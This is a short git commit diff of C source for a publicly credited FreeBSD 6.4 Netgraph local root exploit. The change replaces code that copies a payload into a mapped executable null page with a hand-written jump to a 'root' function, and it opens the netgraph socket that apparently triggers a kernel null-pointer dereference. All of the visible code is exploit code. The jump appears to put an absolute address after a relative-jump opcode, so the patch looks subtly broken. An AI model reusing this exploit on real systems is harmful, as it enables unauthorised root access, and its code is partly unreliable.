Don't copy. Just jmp to function.

1 files changed, 6 insertions, 25 deletions

diff --git a/current-thread-exec.c b/current-thread-exec.c
index cd6bd1d..01f9acc 100644
--- a/current-thread-exec.c
+++ b/current-thread-exec.c
@@ -90,42 +90,23 @@ int root(void)
 
 int main(int argc, char *argv[])
 {
-	unsigned char *c;
-	unsigned char *d;
-	void *v;
-	int s;
-
 	fprintf(stderr, "~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n");
 	fprintf(stderr, "~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n");
 	fprintf(stderr, "~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n");
 
 	fprintf(stderr, "[+] mmapping null page\n");
-	v = mmap(
-		NULL,
-		PAGES * PAGE_SIZE,
-		PROT_READ | PROT_WRITE | PROT_EXEC, 
-		MAP_ANON | MAP_FIXED, 
-		-1, 
-		0);
-	if (v == MAP_FAILED) {
+	if (mmap(NULL, PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) {
 		perror("[-] mmap failed");
 		return -1;
 	}
 
-	fprintf(stderr, "[+] copying pwnage into null page\n");
-	c = v;
-	d = (unsigned char*)root;
-	while (1) {
-		*c = *d;
-		if (*d == 0xc3)
-			break;
-		d++;
-		c++;
-	}
-	*c++ = 0xc3;
+	fprintf(stderr, "[+] adding jmp to pwnage in null page\n");
+	*(char*)0x0 = 0x90;
+	*(char*)0x1 = 0xe9;
+	*(unsigned long*)0x2 = (unsigned long)&root;
 
 	fprintf(stderr, "[+] opening netgraph socket\n");
-	s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
+	int s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
 	if (s < 0) {
 		perror("[-] failed to open netgraph socket");
 		return -1;